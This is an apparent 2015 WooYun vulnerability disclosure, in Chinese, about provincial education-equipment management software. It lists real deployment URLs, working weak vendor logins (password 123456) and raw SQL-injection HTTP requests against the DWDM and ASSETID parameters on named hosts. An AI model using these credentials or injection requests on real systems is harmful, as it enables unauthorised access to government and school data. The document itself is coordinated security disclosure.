当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090336

漏洞标题:某教育技术装备软件存在通用型漏洞(弱口令到SQL注入)

相关厂商:湖南联羿科技有限公司

漏洞作者: Coody

提交时间:2015-01-09 15:53

修复时间:2015-04-13 16:58

公开时间:2015-04-13 16:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:14

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-09: 细节已通知厂商并且等待厂商处理中
2015-01-14: 厂商已经确认,细节仅向厂商公开
2015-01-17: 细节向第三方安全合作伙伴开放
2015-03-10: 细节向核心白帽子及相关领域专家公开
2015-03-20: 细节向普通白帽子公开
2015-03-30: 细节向实习白帽子公开
2015-04-13: 细节向公众公开

简要描述:

通用型漏洞(弱口令到SQL注入)

详细说明:

百度搜索:教育技术装备管理软件
技术支持:湖南联羿科技有限公司
案例:
http://218.76.27.45:8062/index0.aspx 广西壮族自治区教育技术装备管理软件
http://zbtj.hyedu.net.cn/index0.aspx 浙江省教育技术装备管理软件
http://sc.zbglxt.com/ 四川省教育技术装备管理软件
http://henan.zbglxt.com/index0.aspx 河南省教育技术装备管理软件
http://hainan.zbglxt.com/index0.aspx 海南省教育技术装备管理软件
http://tzgl.ynjy.cn/index0.aspx 云南省教育技术装备管理软件
… More …
--------------------------------------------------------------------------
0x01: 厂商注册存在通用型弱口令(123456)
访问 http://www.target.com/UserRegister.aspx 查看厂商代码,或自行注册即可…

QQ图片20150106171114.jpg


这里可以看到,是有规律可循(00001,00002,…,00059)
厂商登录页面为:http://www.target.com/NblyLogin.aspx

QQ图片20150106171259.png


用户名即为 厂商代码,密码可尝试 123456
漏洞证明:
(a)http://218.76.27.45:8062/NblyLogin.aspx
用户名:00138 密码:123456

QQ图片20150106172218.jpg


(b)http://zbtj.hyedu.net.cn/NblyLogin.aspx
用户名:00011 密码:123456

QQ图片20150106172429.jpg


(c)http://sc.zbglxt.com/NblyLogin.aspx
用户名:00009 密码:123456

QQ图片20150106172544.jpg


(d)http://henan.zbglxt.com/NblyLogin.aspx
用户名:00029 密码:123456

QQ图片20150106172656.png


0x02:SQL注入漏洞
两处注入
http://www.target.com/Factory/ShowZBDetailsForCountryForSX.aspx?XMBH=164&DWDM=450331*&FBDM=1649&MC=
漏洞参数 DWDM
http://www.target.com/Factory/ShowZBDetailsForNameForSX.aspx?XMBH=164&ASSETID=080005*&FBDM=1649&MC=
漏洞参数 ASSETID
(a)http://218.76.27.45:8062 为例,演示SQL注入漏洞

测试代码一:
GET /Factory/ShowZBDetailsForCountryForSX.aspx?XMBH=164&DWDM=450331*&FBDM=1649&MC=%E5%B9%BF%E8%A5%BF%E6%A1%82%E6%9E%97%E5%B8%82%E8%8D%94%E6%B5%A6%E5%8E%BF%E7%94%B5%E6%95%99%E4%BB%AA%E5%99%A8%E7%AB%99%27%27 HTTP/1.1
Host: 218.76.27.45:8062
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: ASP.NET_SessionId=y4o13jzxhk0koffh41rto0ls


QQ图片20150106173335.jpg


QQ图片20150106173412.jpg


测试代码二:
GET /Factory/ShowZBDetailsForNameForSX.aspx?XMBH=164&ASSETID=080005*&FBDM=1649&MC=%E6%95%B0%E7%A0%81%E7%9B%B8%E6%9C%BA%27 HTTP/1.1
Host: 218.76.27.45:8062
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: ASP.NET_SessionId=y4o13jzxhk0koffh41rto0ls


QQ图片20150106173705.jpg


(b)http://zbtj.hyedu.net.cn/ 为例,演示SQL注入漏洞

测试代码三:
GET /Factory/ShowZBDetailsForCountryForSX.aspx?XMBH=18&DWDM=330521&FBDM=8&MC=%E5%BE%B7%E6%B8%85%E5%8E%BF HTTP/1.1
Host: zbtj.hyedu.net.cn
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: ASP.NET_SessionId=if1jgx2uoysqm4nulmu5x401


QQ图片20150106174440.jpg


QQ图片20150106174538.jpg


测试代码四:
GET /Factory/ShowZBDetailsForNameForSX.aspx?XMBH=18&ASSETID=01013*&FBDM=8&MC=%E5%9B%BE%E5%BD%A2%E8%AE%A1%E7%AE%97%E5%99%A8 HTTP/1.1
Host: zbtj.hyedu.net.cn
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: ASP.NET_SessionId=if1jgx2uoysqm4nulmu5x401


QQ图片20150106175224.jpg


其他不再证明::::::

漏洞证明:

修复方案:

版权声明:转载请注明来源 Coody@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-01-14 13:38

厂商回复:

CNVD确认所述漏洞情况,暂未建立与软件生产厂商的直接处置渠道,待认领。

最新状态:

暂无